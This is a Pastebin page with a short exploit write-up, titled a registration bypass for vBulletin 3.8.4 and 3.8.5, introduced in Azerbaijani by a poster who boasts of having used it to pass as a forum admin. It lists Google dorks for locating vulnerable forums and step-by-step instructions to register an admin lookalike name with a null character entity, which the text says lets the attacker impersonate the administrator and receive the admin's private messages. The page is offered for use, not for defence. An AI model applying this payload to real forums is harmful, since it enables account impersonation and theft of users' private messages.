API tools faq
paste
Advertisement
Guest User

vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability

a guest
Mar 7th, 2015
709
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.14 KB | None | 0 0
raw download clone embed print report
  1. Salam.
  2. Bu gün sizlərə vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability açığını göstərəcəm maraqlı açıqdı bunun sayəsində admin adıyla foruma qey ola bilərsiniz mən etdim hamı məni admin bilirdi :)
  3.  
  4. [code]# Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
  5. # Date: 29/08/2010
  6. # Author: Immortal Boy
  7. # Software Link: http://www.vbulletin.org
  8. # Version: 3.8.4 & 3.8.5
  9. # Google dork 1 : powered by vBulletin 3.8.4
  10. # Google dork 2 : powered by vBulletin 3.8.5
  11. # Platform / Tested on: Multiple
  12. # Category: webapplications
  13. # Code : N/A
  14.  
  15. # BUG : #########################################################################
  16.  
  17. 1 > Go to Http://[localhost]/path/register.php
  18.  
  19. 2 > Assume that forum admin user name is ADMIN
  20.  
  21. 3 > Type this at User Name ===> ADMIN&#00
  22.  
  23. 4 > &#00 is an ASCII Code
  24.  
  25. 5 > And complete the other parameters
  26.  
  27. 6 > Then click on Complete Registrarion
  28.  
  29. 7 > Now you see that your user name like admin user name
  30.  
  31. After this time the private messages to the user (ADMIN) to sending see for you is sending .[/code]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!